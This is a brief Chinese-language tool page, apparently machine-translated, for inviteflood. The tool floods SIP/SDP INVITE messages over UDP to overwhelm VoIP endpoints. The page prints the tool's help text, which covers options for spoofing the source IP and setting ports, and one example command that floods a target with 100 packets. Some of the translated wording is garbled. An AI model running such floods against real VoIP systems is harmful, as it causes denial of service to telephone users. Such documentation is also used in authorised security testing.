
一个工具来执行SIP / SDP INVITE通过UDP / IP消息泛滥。经测试在Linux红帽的Fedora Core 4平台(奔腾IV,2.5千兆赫),但预计该工具将成功建立和各种Linux发行版执行。

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  • 作者:马克D.科利尔,马克·奥布莱恩
  • 许可:GPL第二版

    0x01 包含在inviteflood包工具

    inviteflood - SIP / SDP INVITE消息充斥在UDP / IP

    :~# inviteflood -h
    inviteflood - Version 2.0
                June 09, 2006
    Mandatory -
      interface (e.g. eth0)
      target user (e.g. "" or john.doe or 5000 or "1+210-555-1212")
      target domain (e.g. or an IPv4 address)
      IPv4 addr of flood target (ddd.ddd.ddd.ddd)
      flood stage (i.e. number of packets)
    Optional -
      -a flood tool "From:" alias (e.g. jane.doe)
      -i IPv4 source IP address [default is IP address of interface]
      -S srcPort  (0 - 65535) [default is well-known discard port 9]
      -D destPort (0 - 65535) [default is well-known SIP port 5060]
      -l lineString line used by SNOM [default is blank]
      -s sleep time btwn INVITE msgs (usec)
      -h help - print this usage
      -v verbose output mode

    0x02 inviteflood用法示例

    使用eth0接口 了(eth0)和 提供的用户 (5000), 防洪目标域 (example.local)(,使用 100个数据包 (100) 防洪目标: ```bash

    :~# inviteflood eth0 5000 example.local 100 inviteflood - Version 2.0

            June 09, 2006

    source IPv4 addr:port = dest IPv4 addr:port = targeted UA =

Flooding destination with 100 packets sent: 100 ```


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